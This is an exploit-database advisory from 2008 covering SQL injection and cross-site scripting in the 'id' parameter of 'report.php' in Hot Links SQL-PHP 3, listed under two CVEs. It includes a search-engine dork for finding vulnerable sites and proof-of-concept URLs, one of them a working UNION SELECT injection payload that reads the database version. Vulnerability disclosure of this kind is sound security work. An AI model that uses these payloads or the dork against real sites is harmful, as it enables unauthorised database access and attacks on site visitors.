Hot Links SQL-PHP 3 - 'report.php' Multiple Vulnerabilities

Author: sl4xUz
type: webapps
platform: php
port: 
date_added: 2008-09-08 
date_updated:  
verified: 1 
codes: OSVDB-48920;CVE-2008-4379;OSVDB-48919;CVE-2008-4378 
tags: 
aliases:  
screenshot_url:  
application_url: 

###########################################################
#
#        ___    __ __                  __  __
#       /\_ \  /\ \\ \                /\ \/\ \
#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____
#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\
# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
#
#                                 security breakd0wn!
###########################################################
#
# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities
# Vendor: http://www.mrcgiguy.com
# Vulnerable Version: 3 and prior versions
# Fix: N/A
#
###########################################################
#
# c0ntact: sl4x.xuz[at]gmail[dot]com
# d0rk: "Powered By: Hot Links SQL-PHP 3"
# stop lammo
#
###########################################################

######################
  1. Information
######################
     Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free.

######################
  2. Vulnerabilities
######################
     SQL Injection in "report.php" in the "id" parameter.
     Cross Site Scripting in "report.php" in the "id" parameter.

######################
  3. PoC
######################
     http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3--
     http://localhost/path/report.php?id=[XSS]

###########################################################

# milw0rm.com [2008-09-09]